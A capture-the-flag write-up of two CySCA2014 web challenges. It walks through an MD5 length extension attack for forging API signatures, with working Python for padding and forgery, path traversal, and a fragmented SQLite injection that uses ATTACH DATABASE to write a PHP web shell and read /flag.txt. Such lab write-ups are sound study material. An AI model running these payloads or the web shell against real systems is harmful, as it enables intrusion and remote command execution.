So we did what you should always do when you are at a loss for answers: we turned to Google. After a couple of different queries one of us stumbled on something called a ‘length extension attack’. A length extension attack is something that can be used to calculate a valid hash when you have the hash of (secret + message) and you know both the message and the length of the secret, even if you don’t know the secret itself. This sounded almost exactly like what we were faced with, although we didn’t know the length of our secret.

Length extension attacks work due to a vulnerability in numerous hashing algorithms, including MD5. The vulnerability has to do with how these algorithms calculate a hash value. For instance, MD5 processes input in blocks of a specific length (512 bits). The value of (secret + message) is padded with a ‘1’ bit and a number of ‘0’ bits, followed by the length in bits of the string (the string being secret + message) encoded as a 64-bit little-endian integer, so that the total is a multiple of 512 bits. So while the hexadecimal value of (secret + message) might be “73 65 63 72 65 74 64 61 74 61” (secretdata), the MD5 algorithm will add padding and a length indicator to it before hashing so that it looks like this:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00”
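To make the padding concrete, here is a small Python helper (our own illustration, not part of the challenge) that reproduces the padded block above:

```python
import struct

def md5_padding(msg_len):
    """The padding MD5 appends to a msg_len-byte message: a 0x80 byte,
    zero bytes until the length is 56 mod 64, then the bit length of the
    message as a 64-bit little-endian integer."""
    return (b"\x80" + b"\x00" * ((55 - msg_len) % 64)
            + struct.pack("<Q", msg_len * 8))

padded = b"secretdata" + md5_padding(len("secretdata"))
print(padded.hex(" "))  # matches the 64-byte block shown above
```

Note the final eight bytes: 80 bits (10 bytes) is 0x50, stored little-endian, which is why the block ends in “50 00 00 00 00 00 00 00”.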

So how can this be exploited? Well, the specifics get a little complicated here, so we’ll refer you to two excellent sources on the details of length extension attacks: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks and https://blog.whitehatsec.com/hash-length-extension-attacks/.

Although we can’t say we completely understand the specifics of length extension attacks, we’ll try to put into words our understanding from what is explained in the two sources above in the hopes we don’t fuck it up too much. Basically, you can add information to the string that you want to include in the calculation of the hash. For instance, instead of hashing “secretdata” we might want to calculate the hash of “secretdatamoredata”. The length extension attack will not work if you simply add stuff to the original message. However, it WILL work if you include the padding, and then add additional information to the end of that. Adding the hex value “6d 6f 72 65 64 61 74 61” (moredata) to the end gives us:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 6d 6f 72 65 64 61 74 61”

The MD5 hashing algorithm will first calculate the hash for the first 512 bits (which will result in the hash that we already know) and it will use that value as a starting point for the calculation of the added data. Since we know the original hash, we can add information to the message without ever knowing the secret and still calculate a valid hash value! However, we do need to know the length of the secret because otherwise we would not know how much padding to add to get to 512 bits. So let’s move on from the theory and look specifically at how we were able to implement the length extension attack.
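For readers who want to see the mechanics end to end, below is a toy pure-Python MD5 (following RFC 1321) with a resume-from-digest option, which is exactly the primitive a length extension attack needs. This is our own sketch for illustration only; use HashPump or hash_extender for real work.

```python
import math
import struct

# Per-round shift amounts and sine-derived constants from RFC 1321.
S = ([7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4
     + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4)
K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]

def md5_pad(total_len):
    # Standard MD5 padding for a message of total_len bytes.
    return (b"\x80" + b"\x00" * ((55 - total_len) % 64)
            + struct.pack("<Q", total_len * 8))

def md5(data, state=None, prev_len=0):
    """Toy MD5. With state/prev_len it resumes from a known digest as if
    prev_len bytes (a multiple of 64) had already been hashed."""
    if state is None:
        a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    else:
        a, b, c, d = struct.unpack("<4I", state)
    msg = data + md5_pad(prev_len + len(data))
    for off in range(0, len(msg), 64):
        M = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(64):
            if i < 16:
                F, g = (B & C) | (~B & D), i
            elif i < 32:
                F, g = (D & B) | (~D & C), (5 * i + 1) % 16
            elif i < 48:
                F, g = B ^ C ^ D, (3 * i + 5) % 16
            else:
                F, g = C ^ (B | ~D), (7 * i) % 16
            F = (F + A + K[i] + M[g]) & 0xFFFFFFFF
            rot = ((F << S[i]) | (F >> (32 - S[i]))) & 0xFFFFFFFF
            A, D, C, B = D, C, B, (B + rot) & 0xFFFFFFFF
        a, b = (a + A) & 0xFFFFFFFF, (b + B) & 0xFFFFFFFF
        c, d = (c + C) & 0xFFFFFFFF, (d + D) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)

def extend(known_digest, secret_plus_msg_len, append):
    """Forge md5(secret + msg + glue + append) without knowing the secret."""
    glue = md5_pad(secret_plus_msg_len)
    forged = md5(append, state=known_digest,
                 prev_len=secret_plus_msg_len + len(glue))
    return glue, forged
```

The key observation is in `extend`: the known digest is loaded back in as the internal state, so hashing continues from where the server’s own computation left off.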

As mentioned previously, we understood the gist of the length extension attack but we didn’t know enough about hashing algorithms or cryptography to execute this attack ourselves from scratch. Fortunately there are smarter people than us around who wrote tools to make such an attack a lot easier to do. Two such tools are ‘HashPump’ and ‘hash_extender’, both of which can be downloaded from Github. We ended up using HashPump so I will use that in my write-up of the challenge, but hash_extender offers the same functionality and both are very easy to use.

HashPump requires the following arguments: (1) the original message, (2) the original hash, (3) the message / data to add, and (4) the length of the original secret. We had three out of these four arguments – we did not know the length of the secret. To overcome this obstacle we wrote a script with a loop that included the three variables we did know and incremented the value for ‘length of the original secret’ by one on each loop. At the end of each loop it would submit a POST request to the server, formatted according to the description in the rest-api-v2.txt document, and display the resulting server response. Please note that we didn’t get all the syntax and formatting correct in this script right away. Like everything else during Cysca2014 it took us several hours to write a script that did exactly what we wanted. For instance, just figuring out that the padding provided by HashPump needed to be converted from ‘\x00’ to ‘%00’ before the server would accept the request took a very long time by itself. But eventually we were rewarded for our efforts with a server response that said “error: file path does not exist”. We now knew that the length of ‘secret’ was 16 characters.
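Our length-guessing loop looked roughly like the sketch below. The `send` callable is a stand-in for the code that forges a request for a given secret length and posts it (ours shelled out to HashPump), and `encode_payload` shows the ‘\x00’ to ‘%00’ conversion that cost us so much time:

```python
import urllib.parse

def encode_payload(raw):
    """Percent-encode HashPump's raw output for the POST body: the
    padding bytes (\\x80, \\x00, ...) must go over the wire as %80, %00."""
    return urllib.parse.quote_from_bytes(raw, safe="./")

def find_secret_length(send, max_len=64):
    """Try each candidate secret length until the server stops
    complaining about the signature. send(length) forges and posts a
    request for that length and returns the response body."""
    for length in range(1, max_len + 1):
        if "signature" not in send(length).lower():
            return length
    return None
```

With the real server, `send(16)` was the first call to come back with “error: file path does not exist” instead of a signature error.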



So now we have all the information we need to create valid API signatures, right? Yes and no. Yes, we can create a valid signature for certain types of modified requests, but what can we do now? We can’t modify the original request (at least, at this point we didn’t think we could) because the length extension attack depends on the original message and hash to calculate a new one for the appended data. So all we can do is add something to the end. We tried moving back directories (adding ‘/../../../../var/www/index.php’) and even pointing to files that we knew existed (adding ‘/../rest-api-v2.txt’) but no matter what we added, we always received the “error: file path does not exist” message. Clearly we were still missing something.

After more experimentation and Googling, we finally came across some helpful information. Ironically, this information was found on the Github page (https://github.com/bwall/HashPump) for the tool that we had been using all along – HashPump – driving home once again the importance of attention to detail and carefully going through documentation. Looking at their example of a length extension attack, the information that they append to the original request is actually a parameter that has already been assigned a value. The idea here is that the parameter is given the value that was assigned to it last, so by re-assigning a value to the parameter you can actually overwrite the original value without having to modify the original request. The screenshot below shows what that would look like in HashPump. We’re giving the ‘filepath’ parameter a new value. However, the server does not accept our new API signature as valid.


We’ve seen previously that our method of calculating new API signatures with a length extension attack is correct, so we must be doing something else wrong. As it turns out, we were doing two things wrong. First of all, we weren’t adding the new value for filepath to HashPump in the correct way. Remember, the REST API documentation specifies that all ‘&’ and ‘=’ symbols need to be removed from the parameter list when calculating the API signature. Although we were doing this in HashPump for the original message, we completely forgot to do it for the appended information. So the server would calculate the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdffilepath/../../../../var/www/index.php”.

Meanwhile HashPump was calculating the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf&filepath=/../../../../var/www/index.php”.

Clearly, these strings would lead to different API signatures. However, after correcting this mistake the server would still not accept our API signature. Apparently the server was processing the request differently than we were expecting. Maybe it was not simply overwriting the parameter with the last assigned value, or maybe it was overwriting it before calculating the API signature. In both of those cases, the resulting API signature would be different from the one we calculated using HashPump.


Again we returned to Google for ideas on what to do next, and this time we stumbled on one of the most famous examples of a length extension attack: The exploitation of Flickr’s REST API in 2009. A write-up of this attack can be found here: http://netifera.com/research/flickr_api_signature_forgery.pdf.

We noticed two things while reading this write-up: (1) the scenario provided in this Cysca challenge is identical to the vulnerability in Flickr’s REST API down to the description of the API itself, and (2) we completely missed a vulnerability in how the API signature is calculated. What we failed to pick up on initially is that with the way an API signature is calculated, a signature for “filepath=./example.pdf” is equivalent to the signature for “f=ilepath./example.pdf”. The reason for this is that for the calculation of the signature, the ‘&’ and ‘=’ symbols are removed from the string, so for both examples the resulting string on which the signature is calculated would be “filepath./example.pdf”. This is the crucial factor in this challenge that allowed us to generate valid API keys while modifying the original request.
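The flaw is easy to demonstrate with a mock of the signing scheme as the documentation describes it (our own snippet; the secret here is a placeholder, since the real one is unknown):

```python
import hashlib

SECRET = "0123456789abcdef"  # placeholder for the unknown 16-char secret

def api_signature(params):
    """Sign a parameter string the way the spec describes: strip all
    '&' and '=' characters, prepend the secret, and MD5 the result."""
    stripped = params.replace("&", "").replace("=", "")
    return hashlib.md5((SECRET + stripped).encode()).hexdigest()
```

Because the stripping happens before hashing, `filepath=./example.pdf` and `f=ilepath./example.pdf` collapse to the same string and therefore the same signature, regardless of what the secret is.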

We ended up using this information by assigning almost everything in the original message to a parameter named just ‘c’ – the first letter in the original message – that would be ignored by the server, since ‘c’ is not a parameter that makes sense to the server. We then used HashPump to append the original parameter names to the request and generate a valid signature. The following screenshots show what that looks like, from the command line as well as the request that was issued to the server.



Finally! We were able to modify the values for the parameters that get submitted to the server while still being able to use the original message to perform a length extension attack and generate a valid API signature!

Now, all we have to do is find the path to an existing file on the server. We know that the file ‘index.php’ exists, since it gets included in the URL to reach the Fortress Certifications front page. Apparently, it is not located at ‘/var/www/index.php’, which is where it commonly resides. Instead, it is located in the same directory as the ‘documents’ folder. This was found out after trying a couple of different requests with different file paths, until the message below was received.


This message indicates that the REST API created a new link to the document ‘index.php’. Note that the IP address for the host has changed from before; this is because of changes in our virtual network settings and not because of the request to the REST API.

Navigating to this URL provided us with a download prompt, and opening the downloaded file provided us with more information about other files that might be worth looking at: ‘cache.php’ and ‘caching.php’.


We can repeat the same process as before to also create links to these files through the REST API. After doing so, and opening ‘cache.php’, we found the flag that marks the completion of this challenge: “OrganicPamperSenator877”.



Reveal the final flag, which is hidden in the /flag.txt file on the web server.

The ‘index.php’ and ‘cache.php’ files tell us how we can get to the caching control panel. We need to generate an MD5 hash of “OrganicPamperSenator877” and append it to http://<host>/cache.php?access=. Doing so brings us to the page below.
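Generating the access token is a one-liner in Python (the `<host>` placeholder is kept as in the write-up):

```python
import hashlib

# The flag recovered from cache.php in the previous challenge.
flag = "OrganicPamperSenator877"
token = hashlib.md5(flag.encode()).hexdigest()
url = "http://<host>/cache.php?access=" + token
```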


The caching control panel enables the caching of certain pages. We can enter a title and a URL for a page, and it will be stored as a cached page in the backend database. How this works exactly can be learned by investigating the source code for ‘cache.php’ and ‘caching.php’. These pages contain the functions and logic that work behind the scenes when a request is submitted through this page, and thoroughly investigating the source code can reveal any flaws or vulnerabilities in the caching process.

Through code investigation and some experimentation we were able to determine that the ‘Title’ field is vulnerable to code injection. After submitting a query, the function that inputs the data into the database is “setCache”, which takes the parameters ‘key’, ‘title’, ‘uri’, and ‘data’. Additionally it uses the database function ‘datetime()’ to insert the date and time of when the query was submitted into the database. This function can be seen below. The ‘title’ and ‘uri’ variables come from what we enter into the caching control panel. The ‘key’ variable is an MD5 hash of the server name plus the requested URI, and ‘data’ is the contents of the page that was entered into the ‘URI’ field.


It’s possible to break out of the query built by this function through the use of single quotation marks, supplying self-chosen values for the variables that the function is expecting. The result of doing so can be seen below.
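The real setCache() is PHP, which we won’t reproduce here, but a Python mock of the same unparameterized pattern (the column names are our guesses) shows why a single quote in the title is enough to break out:

```python
def set_cache_sql(key, title, uri, data):
    # Mimics the vulnerable pattern: values are dropped straight into
    # the SQL statement with no escaping or parameter binding.
    return ("INSERT INTO cache (key, title, uri, data, created) "
            "VALUES ('%s', '%s', '%s', '%s', datetime());"
            % (key, title, uri, data))

# A single quote in the title closes the string literal early, so
# everything after it is parsed as SQL rather than data:
evil_title = "x','y','z',datetime()); --"
sql = set_cache_sql("k", evil_title, "u", "d")
```

Everything after the `--` in the resulting statement is commented out, which is why the leftover tail of the original query only produces a harmless syntax error.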




Even though we get a syntax error, generated by the remaining code behind our injection, the function executes just fine and our self-chosen values get entered into the database. Additionally, by using a SQLite function – random() – in our injection we determined that we can successfully execute other SQLite functions besides datetime(). We knew the backend database was SQLite because this was specified in the source code of ‘caching.php’.

This is where we got stuck on this challenge. It seems clear that we have to use code injection and database functions to get to the ‘/flag.txt’ file on the server, but there are two constraining factors that make this challenge extremely difficult: (1) there is a character limit of 40 characters on the ‘Title’ field in the caching control panel. This makes it almost impossible to inject anything useful, and (2) while there is no character limit on the ‘URI’ field, anything entered into this field gets parsed and validated by functions in ‘caching.php’, which makes it seemingly impossible to inject anything into this field.

We spent many hours experimenting with different types of injections and different strategies. We found a page online that explains how to exploit a SQLite database through the use of the ‘ATTACH DATABASE’ command: http://atta.cked.me/home/sqlite3injectioncheatsheet. However, it seemed like this strategy would not work for us due to the limit on how many characters we could enter. Eventually we decided that this challenge was beyond us and we decided to look at the walkthrough posted on the CySCA2014 website: https://cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf.

Since we didn’t solve this challenge, I won’t provide a description of the solution. Instead I recommend you follow the link above for a walkthrough of the problem. After reading the solution, we were glad we didn’t spend more time on trying to solve it than we already had because the walkthrough blew our minds. There was no way we could have figured this out for ourselves. We were on the right path but the steps that had to be taken to get around the character limit were ridiculous. For the remainder of this walkthrough I will focus on explaining the steps in the CySCA solution, since I don’t think their walkthrough provides a lot of clarification on how to get to ‘/flag.txt’. Even after following their steps it took us some time and reasoning to figure out why they worked.

The walkthrough describes that the goal is to inject the following 122-character string into the database:

',0); ATTACH DATABASE 'a.php' AS a; CREATE TABLE a.b (c text); INSERT INTO a.b VALUES ('<? system($_GET[''cmd'']); ?>');/*

The way this is accomplished is by breaking the string up into smaller sections and piecing them back together at a later point. The four strings that are individually injected will be:

  1. ',0);ATTACH DATABASE 'a.php' AS a;/*
  2. */CREATE TABLE a.b (c text);INSERT /*
  3. */INTO a.b VALUES('<? system($'||/*
  4. */'_GET[''cmd'']); ?>');/*

Each string starts with the end to a block comment (*/) and ends with the start to a block comment (/*), except for the first string which doesn’t start with one. This ensures that any code that might make its way in between these strings is commented out – this is what allows these individual database entries to be pieced back together into a single injection string. After performing the code injection, the caching control page will look as below:
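A small, self-contained illustration (our own, not the challenge code) of why the block comments make reassembly work: whatever sits between consecutive fragments gets swallowed by the /* ... */ pairs.

```python
import re

# The four stored fragments, as in the walkthrough.
fragments = [
    "',0);ATTACH DATABASE 'a.php' AS a;/*",
    "*/CREATE TABLE a.b (c text);INSERT /*",
    "*/INTO a.b VALUES('<? system($'||/*",
    "*/'_GET[''cmd'']); ?>');/*",
]

def reassemble(rows):
    # Join the rows with stand-in junk (the other data the query engine
    # would encounter between our fragments), then strip the comments,
    # which is effectively what the SQL parser does.
    joined = "NOISE".join(rows)
    return re.sub(r"/\*.*?\*/", "", joined, flags=re.DOTALL)
```

Running `reassemble(fragments)` yields the single 122-character injection string, with the trailing `/*` left open to comment out whatever code follows.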


You’ll notice that the third entry looks incomplete. However, investigation of the source code of the page reveals that the injected code is all there, it’s just being interpreted differently by your browser.


So what is this supposed to do, once pieced back together? The ‘ATTACH DATABASE’ command will attach a database file to SQLite, but if this file doesn’t exist it will be created. Therefore, effectively this command is creating a file called “a.php”. The rest of the commands first create a table in the newly created database (table a.b) with a single text column named ‘c’. One line is inserted into this table: ‘<? system($’ || ‘_GET[’’cmd’’]); ?>’, which concatenates to <? system($_GET[’cmd’]); ?>. This code will eventually find its way into the database file ‘a.php’, and ‘a.php’ should then be accessible as a web page where it will attempt to execute a given system command. So effectively the injection code will provide us with a shell on the system through a web page.
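This file-write primitive is easy to verify locally with Python’s sqlite3 module (a hypothetical stand-alone demo, not the challenge server):

```python
import os
import sqlite3
import tempfile

# ATTACH DATABASE as a file-write primitive: attaching a non-existent
# database creates the file, and inserted text is stored verbatim
# inside it (surrounded by SQLite's page structures).
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "a.php")
    con = sqlite3.connect(":memory:")
    con.execute("ATTACH DATABASE '%s' AS a" % path)
    con.execute("CREATE TABLE a.b (c text)")
    con.execute("INSERT INTO a.b VALUES ('<? system($_GET[''cmd'']); ?>')")
    con.commit()
    con.close()
    blob = open(path, "rb").read()
```

Dumping `blob` shows the SQLite header followed (eventually) by the raw PHP payload, which is exactly why serving a.php through the web server yields a working shell.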

The way in which these four lines of code are pieced back together is by caching the ‘cache.php’ page itself. It took us a while to reason out how caching the caching page would execute this code, but it works because of the first line of injection code. You’ll notice that it starts with “’,0);”. Thinking back to the ‘setCache’ function in the ‘caching.php’ source code, you’ll remember that it takes several parameters, one of which is ‘$data’. The ‘data’ variable contained the source code for whatever page was being cached. By starting the first line of injection code with “’,0);” we’re effectively breaking out of the ‘data’ variable and executing the code that comes after – the code that attaches the database.

So by caching the ‘cache.php’ page, the setCache() function will look at the source code for the page that is being cached: ‘cache.php’. On the page it will encounter the first line of injection code, which breaks out of the ‘data’ variable. It then executes the rest of the code until it gets to the block comment marker (/*). It ignores whatever comes next until the end of the block comment marker is encountered, which is at the beginning of the next line of injection code. This continues until all four lines of injection code have been pieced together, and they then get executed, causing ‘a.php’ to be created with the code that allows us to execute commands on the system. The screenshots below show this process.


NOTE: I messed up my commands, resulting in a file ‘a.php’ which did not allow me to execute system commands. I entered everything again but of course database ‘a’ and table ‘a.b’ already existed, so in the rest of the screenshots you will see ‘z.php’ and database ‘z’ instead.



As shown above, accessing ‘z.php’ and feeding it the ‘ls’ command returns the contents of the working directory. The SQLite information at the start of the file is there because SQLite created ‘z.php’ as a database file, so it has additional database information in it. It doesn’t interfere with our commands though, and feeding it the system command ‘cat /flag.txt’ returns to us the final flag for the web application pentest section of CySCA2014: “TryingCrampFibrous963”.